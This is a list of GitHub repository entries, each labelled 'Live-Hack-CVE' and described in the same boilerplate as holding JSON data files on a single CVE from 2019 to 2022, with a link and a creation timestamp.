**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19526 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19526](https://github.com/Live-Hack-CVE/CVE-2019-19526) create time: 2022-12-24T02:40:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19530](https://github.com/Live-Hack-CVE/CVE-2019-19530) create time: 2022-12-24T02:40:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19527 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19527](https://github.com/Live-Hack-CVE/CVE-2019-19527) create time: 2022-12-24T02:40:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19531 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19531](https://github.com/Live-Hack-CVE/CVE-2019-19531) create time: 2022-12-24T02:40:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19524 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19524](https://github.com/Live-Hack-CVE/CVE-2019-19524) create time: 2022-12-24T02:40:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19525 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19525](https://github.com/Live-Hack-CVE/CVE-2019-19525) create time: 2022-12-24T02:40:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19523 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19523](https://github.com/Live-Hack-CVE/CVE-2019-19523) create time: 2022-12-24T02:40:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2988 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2988](https://github.com/Live-Hack-CVE/CVE-2019-2988) create time: 2022-12-24T02:35:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2992 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2992](https://github.com/Live-Hack-CVE/CVE-2019-2992) create time: 2022-12-24T02:35:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9383](https://github.com/Live-Hack-CVE/CVE-2020-9383) create time: 2022-12-24T03:19:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11884 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11884](https://github.com/Live-Hack-CVE/CVE-2020-11884) create time: 2022-12-24T03:19:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11015 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11015](https://github.com/Live-Hack-CVE/CVE-2020-11015) create time: 2022-12-24T03:19:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13143 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13143](https://github.com/Live-Hack-CVE/CVE-2020-13143) create time: 2022-12-24T03:19:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9296](https://github.com/Live-Hack-CVE/CVE-2020-9296) create time: 2022-12-24T03:19:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14374 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14374](https://github.com/Live-Hack-CVE/CVE-2020-14374) create time: 2022-12-24T03:19:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12100 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12100](https://github.com/Live-Hack-CVE/CVE-2020-12100) create time: 2022-12-24T03:19:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17368 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17368](https://github.com/Live-Hack-CVE/CVE-2020-17368) create time: 2022-12-24T03:19:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14005 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14005](https://github.com/Live-Hack-CVE/CVE-2020-14005) create time: 2022-12-24T03:19:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9048 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9048](https://github.com/Live-Hack-CVE/CVE-2020-9048) create time: 2022-12-24T03:19:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3499 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3499](https://github.com/Live-Hack-CVE/CVE-2020-3499) create time: 2022-12-24T03:18:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25708 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25708](https://github.com/Live-Hack-CVE/CVE-2020-25708) create time: 2022-12-24T03:18:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27350 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27350](https://github.com/Live-Hack-CVE/CVE-2020-27350) create time: 2022-12-24T03:18:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8554 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8554](https://github.com/Live-Hack-CVE/CVE-2020-8554) create time: 2022-12-24T03:18:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10065 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10065](https://github.com/Live-Hack-CVE/CVE-2020-10065) create time: 2022-12-24T03:17:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7677 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7677](https://github.com/Live-Hack-CVE/CVE-2020-7677) create time: 2022-12-24T03:15:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2767 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2767](https://github.com/Live-Hack-CVE/CVE-2020-2767) create time: 2022-12-24T02:39:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28884 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28884](https://github.com/Live-Hack-CVE/CVE-2020-28884) create time: 2022-12-24T02:35:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1357 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1357](https://github.com/Live-Hack-CVE/CVE-2021-1357) create time: 2022-12-24T03:18:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21703 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21703](https://github.com/Live-Hack-CVE/CVE-2021-21703) create time: 2022-12-24T03:18:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43362 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43362](https://github.com/Live-Hack-CVE/CVE-2021-43362) create time: 2022-12-24T03:18:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40167](https://github.com/Live-Hack-CVE/CVE-2021-40167) create time: 2022-12-24T03:18:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23839 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23839](https://github.com/Live-Hack-CVE/CVE-2021-23839) create time: 2022-12-24T03:17:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1417 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1417](https://github.com/Live-Hack-CVE/CVE-2021-1417) create time: 2022-12-24T03:17:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20990 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20990](https://github.com/Live-Hack-CVE/CVE-2021-20990) create time: 2022-12-24T03:17:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25217 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25217](https://github.com/Live-Hack-CVE/CVE-2021-25217) create time: 2022-12-24T03:17:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3588](https://github.com/Live-Hack-CVE/CVE-2021-3588) create time: 2022-12-24T03:17:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41099 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41099](https://github.com/Live-Hack-CVE/CVE-2021-41099) create time: 2022-12-24T03:16:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28702 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28702](https://github.com/Live-Hack-CVE/CVE-2021-28702) create time: 2022-12-24T03:16:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20989 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20989](https://github.com/Live-Hack-CVE/CVE-2021-20989) create time: 2022-12-24T03:16:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0129](https://github.com/Live-Hack-CVE/CVE-2021-0129) create time: 2022-12-24T03:16:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35043 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35043](https://github.com/Live-Hack-CVE/CVE-2021-35043) create time: 2022-12-24T03:16:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21705](https://github.com/Live-Hack-CVE/CVE-2021-21705) create time: 2022-12-24T03:16:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33656 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33656](https://github.com/Live-Hack-CVE/CVE-2021-33656) create time: 2022-12-24T03:15:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33655 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33655](https://github.com/Live-Hack-CVE/CVE-2021-33655) create time: 2022-12-24T03:15:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33060 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33060](https://github.com/Live-Hack-CVE/CVE-2021-33060) create time: 2022-12-24T03:15:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43674 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43674](https://github.com/Live-Hack-CVE/CVE-2021-43674) create time: 2022-12-24T03:15:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27855 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27855](https://github.com/Live-Hack-CVE/CVE-2021-27855) create time: 2022-12-24T03:14:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36690 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36690](https://github.com/Live-Hack-CVE/CVE-2021-36690) create time: 2022-12-24T03:14:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27634](https://github.com/Live-Hack-CVE/CVE-2021-27634) create time: 2022-12-24T02:42:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27633 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27633](https://github.com/Live-Hack-CVE/CVE-2021-27633) create time: 2022-12-24T02:42:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27632](https://github.com/Live-Hack-CVE/CVE-2021-27632) create time: 2022-12-24T02:42:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27631 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27631](https://github.com/Live-Hack-CVE/CVE-2021-27631) create time: 2022-12-24T02:42:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27630 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27630](https://github.com/Live-Hack-CVE/CVE-2021-27630) create time: 2022-12-24T02:42:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27629 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27629](https://github.com/Live-Hack-CVE/CVE-2021-27629) create time: 2022-12-24T02:42:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27628 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27628](https://github.com/Live-Hack-CVE/CVE-2021-27628) create time: 2022-12-24T02:42:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27627 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27627](https://github.com/Live-Hack-CVE/CVE-2021-27627) create time: 2022-12-24T02:42:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27626 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27626](https://github.com/Live-Hack-CVE/CVE-2021-27626) create time: 2022-12-24T02:42:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23852 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23852](https://github.com/Live-Hack-CVE/CVE-2022-23852) create time: 2022-12-24T03:18:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23642](https://github.com/Live-Hack-CVE/CVE-2022-23642) create time: 2022-12-24T03:18:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24396 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24396](https://github.com/Live-Hack-CVE/CVE-2022-24396) create time: 2022-12-24T03:18:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20001](https://github.com/Live-Hack-CVE/CVE-2022-20001) create time: 2022-12-24T03:18:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27525 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27525](https://github.com/Live-Hack-CVE/CVE-2022-27525) create time: 2022-12-24T03:18:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27527 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27527](https://github.com/Live-Hack-CVE/CVE-2022-27527) create time: 2022-12-24T03:17:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29855 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29855](https://github.com/Live-Hack-CVE/CVE-2022-29855) create time: 2022-12-24T03:17:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29854 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29854](https://github.com/Live-Hack-CVE/CVE-2022-29854) create time: 2022-12-24T03:17:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1462 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1462](https://github.com/Live-Hack-CVE/CVE-2022-1462) create time: 2022-12-24T03:17:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23055 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23055](https://github.com/Live-Hack-CVE/CVE-2022-23055) create time: 2022-12-24T03:17:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26477 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26477](https://github.com/Live-Hack-CVE/CVE-2022-26477) create time: 2022-12-24T03:17:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31081 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31081](https://github.com/Live-Hack-CVE/CVE-2022-31081) create time: 2022-12-24T03:17:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29948 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29948](https://github.com/Live-Hack-CVE/CVE-2022-29948) create time: 2022-12-24T03:17:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2274](https://github.com/Live-Hack-CVE/CVE-2022-2274) create time: 2022-12-24T03:17:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26365 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26365](https://github.com/Live-Hack-CVE/CVE-2022-26365) create time: 2022-12-24T03:16:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2185 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2185](https://github.com/Live-Hack-CVE/CVE-2022-2185) create time: 2022-12-24T03:16:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33740 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33740](https://github.com/Live-Hack-CVE/CVE-2022-33740) create time: 2022-12-24T03:16:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33744 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33744](https://github.com/Live-Hack-CVE/CVE-2022-33744) create time: 2022-12-24T03:16:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33742 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33742](https://github.com/Live-Hack-CVE/CVE-2022-33742) create time: 2022-12-24T03:16:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33741 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33741](https://github.com/Live-Hack-CVE/CVE-2022-33741) create time: 2022-12-24T03:16:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2318 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2318](https://github.com/Live-Hack-CVE/CVE-2022-2318) create time: 2022-12-24T03:16:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37428 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37428](https://github.com/Live-Hack-CVE/CVE-2022-37428) create time: 2022-12-24T03:15:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40188 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40188](https://github.com/Live-Hack-CVE/CVE-2022-40188) create time: 2022-12-24T03:15:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2405 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2405](https://github.com/Live-Hack-CVE/CVE-2022-2405) create time: 2022-12-24T03:15:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2404 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2404](https://github.com/Live-Hack-CVE/CVE-2022-2404) create time: 2022-12-24T03:15:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31107 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31107](https://github.com/Live-Hack-CVE/CVE-2022-31107) create time: 2022-12-24T03:15:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35918](https://github.com/Live-Hack-CVE/CVE-2022-35918) create time: 2022-12-24T03:15:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41322 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41322](https://github.com/Live-Hack-CVE/CVE-2022-41322) create time: 2022-12-24T03:15:10Z

